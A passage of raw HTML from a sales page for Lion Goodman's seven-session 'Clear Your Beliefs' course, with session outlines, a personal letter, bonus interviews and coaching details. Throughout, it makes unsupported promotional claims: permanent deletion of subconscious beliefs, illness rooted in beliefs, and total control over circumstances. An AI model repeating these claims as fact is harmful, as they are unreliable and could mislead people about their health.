your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n<strong> In Session 7, you will:</strong>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help 